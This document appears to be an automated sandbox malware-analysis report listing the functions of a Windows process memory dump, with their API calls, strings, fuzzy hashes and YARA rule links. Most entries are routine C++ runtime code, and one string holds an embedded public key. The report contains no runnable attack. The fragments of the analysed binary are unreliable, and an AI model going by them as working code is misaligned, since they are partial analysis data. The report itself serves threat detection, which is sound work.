APIs

try_get_function.LIBVCRUNTIME ref: 0145D8F7
try_get_function.LIBVCRUNTIME ref: 0145D916

Part of subcall function 0145CF5C: GetProcAddress.KERNEL32(?,?,FFFFFFFF,0145D48A,?,?,8000000000000000,0145CD2E,?,?,8000000000000000,014522F9), ref: 0145D0B4

try_get_function.LIBVCRUNTIME ref: 0145D935

Part of subcall function 0145CF5C: LoadLibraryExW.KERNEL32(?,?,FFFFFFFF,0145D48A,?,?,8000000000000000,0145CD2E,?,?,8000000000000000,014522F9), ref: 0145CFFF
Part of subcall function 0145CF5C: GetLastError.KERNEL32(?,?,FFFFFFFF,0145D48A,?,?,8000000000000000,0145CD2E,?,?,8000000000000000,014522F9), ref: 0145D00D
Part of subcall function 0145CF5C: LoadLibraryExW.KERNEL32(?,?,FFFFFFFF,0145D48A,?,?,8000000000000000,0145CD2E,?,?,8000000000000000,014522F9), ref: 0145D04F

try_get_function.LIBVCRUNTIME ref: 0145D954

Part of subcall function 0145CF5C: FreeLibrary.KERNEL32(?,?,FFFFFFFF,0145D48A,?,?,8000000000000000,0145CD2E,?,?,8000000000000000,014522F9), ref: 0145D088

try_get_function.LIBVCRUNTIME ref: 0145D973
try_get_function.LIBVCRUNTIME ref: 0145D992
try_get_function.LIBVCRUNTIME ref: 0145D9B1
try_get_function.LIBVCRUNTIME ref: 0145D9D0
try_get_function.LIBVCRUNTIME ref: 0145D9EF
try_get_function.LIBVCRUNTIME ref: 0145DA0E

Strings

LCIDToLocaleName, xrefs: 0145D9F4, 0145DA07
GetLocaleInfoEx, xrefs: 0145D96C
LocaleNameToLCID, xrefs: 0145DA13, 0145DA26
EnumSystemLocalesEx, xrefs: 0145D91B, 0145D92E
GetDateFormatEx, xrefs: 0145D93A, 0145D94D
LCMapStringEx, xrefs: 0145D9E8
AreFileApisANSI, xrefs: 0145D8F0
GetUserDefaultLocaleName, xrefs: 0145D997, 0145D9AA
IsValidLocaleName, xrefs: 0145D9B6, 0145D9C9
CompareStringEx, xrefs: 0145D90F
GetTimeFormatEx, xrefs: 0145D978, 0145D98B

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 3255926029-3252031757
Opcode ID: f523d8889468d30915fedd3e8f19b180816b175b26b5ffe7c1c82b93d9b14d12
Instruction ID: 1a44a61380d324a7425489c914cb972b3f135b451a9daa37bf0661ab1bf02f1c
Opcode Fuzzy Hash: f523d8889468d30915fedd3e8f19b180816b175b26b5ffe7c1c82b93d9b14d12
Instruction Fuzzy Hash: 9C31A271221A5AA1FB44FFA5ECA07D863A1F758348FD0501B8A0A871B5DF78C64EC384

Uniqueness

Uniqueness Score: -1.00%

Function 01449D68, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 01449DF9
DName::operator+.LIBVCRUNTIME ref: 01449E32
DName::operator+.LIBVCRUNTIME ref: 01449F06
DName::operator+.LIBVCRUNTIME ref: 01449F17
DName::operator+.LIBVCRUNTIME ref: 01449F7A
DName::operator+.LIBVCRUNTIME ref: 01449F8A
DName::operator+.LIBVCRUNTIME ref: 01449FD6
DName::operator+.LIBVCRUNTIME ref: 01449FE8
DName::operator+.LIBVCRUNTIME ref: 0144A15B
DName::operator+.LIBVCRUNTIME ref: 0144A1DB
DName::operator+.LIBVCRUNTIME ref: 0144A1EA

Strings

`anonymous namespace', xrefs: 0144A0BB

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: `anonymous namespace'
API String ID: 2943138195-3062148218
Opcode ID: ae9d4e7b3a7719231ef388bf9e8ad1b46be9fe6fd5ed886381f1ca224711c3b5
Instruction ID: 1dca5541d20176375870578af977b44adefb14c0fcfe0f22db78adb7683866f6
Opcode Fuzzy Hash: ae9d4e7b3a7719231ef388bf9e8ad1b46be9fe6fd5ed886381f1ca224711c3b5
Instruction Fuzzy Hash: D6D17D72204B819BEB10DF29E4903DE7BB0F3A9788F948016DB8A5BB34DB78C565C740

Uniqueness

Uniqueness Score: -1.00%

Function 013B3B30, Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 334COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B3F93
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B3F9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B3FA5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B3FAB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B3FB1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B3FB7

Strings

', trying to retrieve ', xrefs: 013B3C5A
', stored ', xrefs: 013B3BB0
NameValuePairs: type mismatch for ', xrefs: 013B3B92
`@@, xrefs: 013B3F6E
0@@, xrefs: 013B4036
#, xrefs: 013B3B89
:@, xrefs: 013B3D74

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: :@$#$', stored '$', trying to retrieve '$0@@$NameValuePairs: type mismatch for '$`@@
API String ID: 3668304517-3741202374
Opcode ID: d33d2d496a6eb46eaf2385bf2df3740c991712e92af95ebf891065d6d7d89484
Instruction ID: 2af86cc85fad8d6a69780de8538e17099c6cd387f1396e22f3f8b0ffb0f50d4c
Opcode Fuzzy Hash: d33d2d496a6eb46eaf2385bf2df3740c991712e92af95ebf891065d6d7d89484
Instruction Fuzzy Hash: 76D19173A14B8586EB008B69E88039D7BB1F7A57A8F505715DBAC07BE9EB78C1D4C300

Uniqueness

Uniqueness Score: -1.00%

Function 01448560, Relevance: 22.9, APIs: 15, Instructions: 358COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 014485B1
DName::operator+.LIBVCRUNTIME ref: 0144868D
DName::operator+.LIBVCRUNTIME ref: 014486D6
DName::operator+.LIBVCRUNTIME ref: 014486E7

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: b8bf26a1bf78cab3cbc0e822da2f79fb159e9154ead60b3110e041cb8ccc8b7b
Instruction ID: 2a4dd6d054b7481e47faccd1e9c91c54b09cc7223b248ff76b6c0f454dc4a853
Opcode Fuzzy Hash: b8bf26a1bf78cab3cbc0e822da2f79fb159e9154ead60b3110e041cb8ccc8b7b
Instruction Fuzzy Hash: CBF16976B00A829FFB11DFA9E4902ED37B1E36474CF44441ADB4967B68DB74C659C380

Uniqueness

Uniqueness Score: -1.00%

Function 013DDBE0, Relevance: 18.2, APIs: 12, Instructions: 189COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DDC0D
std::_Lockit::_Lockit.LIBCPMT ref: 013DDC32
std::_Lockit::~_Lockit.LIBCPMT ref: 013DDC5D
std::_Facet_Register.LIBCPMT ref: 013DDCD5
std::_Lockit::~_Lockit.LIBCPMT ref: 013DDCF8
Concurrency::cancel_current_task.LIBCPMT ref: 013DDD22
std::_Lockit::_Lockit.LIBCPMT ref: 013DDD5D
std::_Lockit::_Lockit.LIBCPMT ref: 013DDD82
std::_Lockit::~_Lockit.LIBCPMT ref: 013DDDAD
std::_Lockit::~_Lockit.LIBCPMT ref: 013DDE48

Part of subcall function 013DEA70: std::_Lockit::_Lockit.LIBCPMT ref: 013DEAEE
Part of subcall function 013DEA70: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013DEB41

std::_Facet_Register.LIBCPMT ref: 013DDE25
Concurrency::cancel_current_task.LIBCPMT ref: 013DDE72

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_Register$Locinfo::_Locinfo_ctor
String ID:
API String ID: 59747551-0
Opcode ID: e0661e1266b5e2840a056d0ed7b7334ab270e34a7cec401d381ac09ac094a755
Instruction ID: b320a0c37ac21f3998dec462c98403ba5e9285c036c2ca6f44c86269b764109d
Opcode Fuzzy Hash: e0661e1266b5e2840a056d0ed7b7334ab270e34a7cec401d381ac09ac094a755
Instruction Fuzzy Hash: 9D712836214B8081DF25DF5AF48039AB761FB98BE8F485626DA9E47BB8DF38C145C700

Uniqueness

Uniqueness Score: -1.00%

Function 0144AB90, Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

`template-type-parameter-, xrefs: 0144AE20
`generic-method-parameter-, xrefs: 0144ADCC
NULL, xrefs: 0144AC49
`generic-class-parameter-, xrefs: 0144AE10

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
API String ID: 0-4167119577
Opcode ID: 21df6020366c572f922d4b37481e10442291c2a3dc30796009ff03005106ac5c
Instruction ID: 178b11d37a8a96a1889b9be85cb5197968a28e5cd19ffc5b7f46580ae5b9ba54
Opcode Fuzzy Hash: 21df6020366c572f922d4b37481e10442291c2a3dc30796009ff03005106ac5c
Instruction Fuzzy Hash: 74B1BDB2B90A548AFF119BA5D8543ED3B71B724798F68401BCF0A5BBB4DB78C146C341

Uniqueness

Uniqueness Score: -1.00%

Function 01447E70, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 01447ECC

Part of subcall function 014450F8: DName::operator+=.LIBVCRUNTIME ref: 01445113

Part of subcall function 01448050: DName::operator+.LIBVCRUNTIME ref: 0144812D

DName::operator+.LIBVCRUNTIME ref: 01447FF9

Strings

class , xrefs: 0144800E
enum , xrefs: 01447FBB
`unknown ecsu', xrefs: 01447E98
union , xrefs: 01448026
struct , xrefs: 0144801D
coclass , xrefs: 01447FB2
cointerface , xrefs: 01447FA0

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+$Name::operator+=
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 179159573-1464470183
Opcode ID: 30cc72df9efa83bdb3dfb64d137035c9a799f0fde90880a673cbdec74b101786
Instruction ID: 282b7b97ec13ff47c937b1412cce5c375c668ed88aecbe016aec9151fcf38a08
Opcode Fuzzy Hash: 30cc72df9efa83bdb3dfb64d137035c9a799f0fde90880a673cbdec74b101786
Instruction Fuzzy Hash: 10516572B20A668AFB10CBA9E8907AD37B0F714398F55011ADE0A67B38DB75C552C740

Uniqueness

Uniqueness Score: -1.00%

Function 01446684, Relevance: 15.2, APIs: 10, Instructions: 150COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 0144674E
DName::operator+.LIBVCRUNTIME ref: 0144675E
DName::operator+.LIBVCRUNTIME ref: 014467AA
DName::operator+.LIBVCRUNTIME ref: 014467BA
DName::operator+.LIBVCRUNTIME ref: 014467CA
DName::operator+.LIBVCRUNTIME ref: 0144683D
DName::operator+.LIBVCRUNTIME ref: 0144684E
DName::operator+.LIBVCRUNTIME ref: 01446860
DName::operator+.LIBVCRUNTIME ref: 0144688C
DName::operator+.LIBVCRUNTIME ref: 0144689B

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 4a2f807c3d828421a289596b4fb05da992c9137c968035ea83c624a9cfc71990
Instruction ID: 3c6956b3c085b3984c75d3d27ebf85ba42f76ff510e5ea2d808dfce41e9fdf38
Opcode Fuzzy Hash: 4a2f807c3d828421a289596b4fb05da992c9137c968035ea83c624a9cfc71990
Instruction Fuzzy Hash: C8515AB2B10B629AFB00DFA5D8902DD37B1F765788B81441ACF096BB28EF74C55AC340

Uniqueness

Uniqueness Score: -1.00%

Function 0144BAF8, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 196COMMON

Download Yara Rule

Strings

generic-type-, xrefs: 0144BC06
template-parameter-, xrefs: 0144BBBF
`generic-type-, xrefs: 0144BC39
`template-parameter-, xrefs: 0144BBF2

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 0-3207858774
Opcode ID: 02082739ff3580753028bb8346212e77d61f98cc9135d7b4b319a7361736cf6a
Instruction ID: 54e246f4a75a1b0b86179213c1a60f90fa034c0291081d902f511dccfb580d4c
Opcode Fuzzy Hash: 02082739ff3580753028bb8346212e77d61f98cc9135d7b4b319a7361736cf6a
Instruction Fuzzy Hash: 63817C72710A899AFB21CF29E4903ED37A1E799B98F984117CB8907775DF38C546C340

Uniqueness

Uniqueness Score: -1.00%

Function 013B2EB0, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013B2F1E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013B2F66
_Getctype.LIBCPMT ref: 013B2FA4
std::_Lockit::~_Lockit.LIBCPMT ref: 013B3063
_Getwctype.LIBCPMT ref: 013B30B1

Strings

bad locale name, xrefs: 013B3085
p$@, xrefs: 013B2F7E
0#@, xrefs: 013B2F74

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: 0#@$bad locale name$p$@
API String ID: 1386471777-2741200729
Opcode ID: faec4e6b30160c01614703065ffc1349e92f89765fd2868c1aa5c95a54f6df99
Instruction ID: 81a1e0ce25c6b9b893dd176c88a0684b5835cee132c5319ed4d0059f6dc650e3
Opcode Fuzzy Hash: faec4e6b30160c01614703065ffc1349e92f89765fd2868c1aa5c95a54f6df99
Instruction Fuzzy Hash: FF514732B01B808AEB05DFB5D5903EC3775FBA4748F48452ACF4927A25EB34D1AAC344

Uniqueness

Uniqueness Score: -1.00%

Function 013DEA70, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DEAEE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013DEB41
std::_Lockit::~_Lockit.LIBCPMT ref: 013DEC75

Strings

true, xrefs: 013DEBCB
false, xrefs: 013DEBB5
bad locale name, xrefs: 013DEC97
p$@, xrefs: 013DEB5A
0#@, xrefs: 013DEB50

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: 0#@$bad locale name$false$p$@$true
API String ID: 2775327233-3332007710
Opcode ID: d2ae940ab78c5fbf5f0e891d1279831fa57b4adbf1571cfef5608d4e23a01238
Instruction ID: 506f6de13e1b65173e8377e1d4876f08c791702a2a297ca125bd19bb0bc07328
Opcode Fuzzy Hash: d2ae940ab78c5fbf5f0e891d1279831fa57b4adbf1571cfef5608d4e23a01238
Instruction Fuzzy Hash: 6C519F33605B8086EB15DF65F89039E7BB4FBA4748F58022ADB8D27A28DF38C165C704

Uniqueness

Uniqueness Score: -1.00%

Function 013B2B50, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013B2BBE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013B2C06
_Getctype.LIBCPMT ref: 013B2C44
std::_Lockit::~_Lockit.LIBCPMT ref: 013B2CDB

Strings

bad locale name, xrefs: 013B2CFD
p$@, xrefs: 013B2C1E
.@, xrefs: 013B2C36
0#@, xrefs: 013B2C14

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: .@$0#@$bad locale name$p$@
API String ID: 2967684691-3197107300
Opcode ID: 9226c4de0ffb7bfc87a1af8621393eebcfa0b4263e89c349d748d3b51aabb6b1
Instruction ID: 333c2178ce85c40477a1d74a300c44bfa46530fd88e9959c8e891c50e7eaee25
Opcode Fuzzy Hash: 9226c4de0ffb7bfc87a1af8621393eebcfa0b4263e89c349d748d3b51aabb6b1
Instruction Fuzzy Hash: 9C514532702B808AEB15DFB5D4903ED3375EB64748F08452ADF4927A29EF34D16AD398

Uniqueness

Uniqueness Score: -1.00%

Function 014497C4, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 01449978

Part of subcall function 014469C4: DName::operator+.LIBVCRUNTIME ref: 01446E71
Part of subcall function 014469C4: DName::operator+.LIBVCRUNTIME ref: 01446EA9

DName::operator+.LIBVCRUNTIME ref: 0144992A

Strings

std::nullptr_t, xrefs: 014498A3
void , xrefs: 01449836
cli::array<, xrefs: 014498F7
cli::pin_ptr<, xrefs: 01449941
std::nullptr_t , xrefs: 014498B6
void, xrefs: 0144980E

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: 2a3cfba06815f6dfce40c83927066ef64a62bf0f42f020821be01822fb3ac170
Instruction ID: 7ad9e571a66b4db92e71e4a42b09eff091f89d1c60ebd20a7992770e48085b7e
Opcode Fuzzy Hash: 2a3cfba06815f6dfce40c83927066ef64a62bf0f42f020821be01822fb3ac170
Instruction Fuzzy Hash: B1516972A14B55DAFB12CF69E8803EE7BB0B708758F484126CF4913B79DB788194C750

Uniqueness

Uniqueness Score: -1.00%

Function 0144B8F0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 0144B964
DName::operator+.LIBVCRUNTIME ref: 0144B973
DName::operator+=.LIBVCRUNTIME ref: 0144BA90

Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 01449DF9
Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 01449E32
Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 0144A15B

DName::operator+.LIBVCRUNTIME ref: 0144BA13
DName::operator+.LIBVCRUNTIME ref: 0144BA23
DName::operator+.LIBVCRUNTIME ref: 0144BACD

Strings

{for , xrefs: 0144B99C

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+$Name::operator+=
String ID: {for
API String ID: 179159573-864106941
Opcode ID: 35e5c641656d7775aeb50f5230e3726b2b01624ef15a8c265aaeb120983eed54
Instruction ID: 9547238f7704a79eb1ec1b8f60f5add235bb89b789f363eb311469c32da23173
Opcode Fuzzy Hash: 35e5c641656d7775aeb50f5230e3726b2b01624ef15a8c265aaeb120983eed54
Instruction Fuzzy Hash: 07515972600B84ABFB12DF29D4803ED77A1F769788F848016DB4C5BB68DB79C6A5C340

Uniqueness

Uniqueness Score: -1.00%

Function 0144C1F0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0144C3F3,?,?,00000000,014419C2,?,?,7FFFFFFFFFFFFFFF,01441619), ref: 0144C273
GetLastError.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0144C3F3,?,?,00000000,014419C2,?,?,7FFFFFFFFFFFFFFF,01441619), ref: 0144C281
LoadLibraryExW.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0144C3F3,?,?,00000000,014419C2,?,?,7FFFFFFFFFFFFFFF,01441619), ref: 0144C2AB
FreeLibrary.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0144C3F3,?,?,00000000,014419C2,?,?,7FFFFFFFFFFFFFFF,01441619), ref: 0144C2F1
GetProcAddress.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0144C3F3,?,?,00000000,014419C2,?,?,7FFFFFFFFFFFFFFF,01441619), ref: 0144C2FD

Strings

api-ms-, xrefs: 0144C293
MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 0144C206

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH$api-ms-
API String ID: 2559590344-1894702607
Opcode ID: cd2cac38d5f5853859366930cf35085f8d0aae47e7ccc2a65be0311c29894dda
Instruction ID: 8e9a1b203976c66364ba028d1f42a025935b581a4803d3daeefaeb9ac5837aa8
Opcode Fuzzy Hash: cd2cac38d5f5853859366930cf35085f8d0aae47e7ccc2a65be0311c29894dda
Instruction Fuzzy Hash: 4A31B33271BA44D6FF16DB96A88079663A4FB48BA4F4E0526EE1D4B365EF78C141C300

Uniqueness

Uniqueness Score: -1.00%

Function 013DD9B0, Relevance: 12.2, APIs: 8, Instructions: 154COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DD9DD
std::_Lockit::_Lockit.LIBCPMT ref: 013DDA02
std::_Lockit::~_Lockit.LIBCPMT ref: 013DDA2D
std::_Facet_Register.LIBCPMT ref: 013DDAA5
std::_Lockit::~_Lockit.LIBCPMT ref: 013DDAC8
Concurrency::cancel_current_task.LIBCPMT ref: 013DDAF2
_Init_thread_footer.LIBCMT ref: 013DDB64
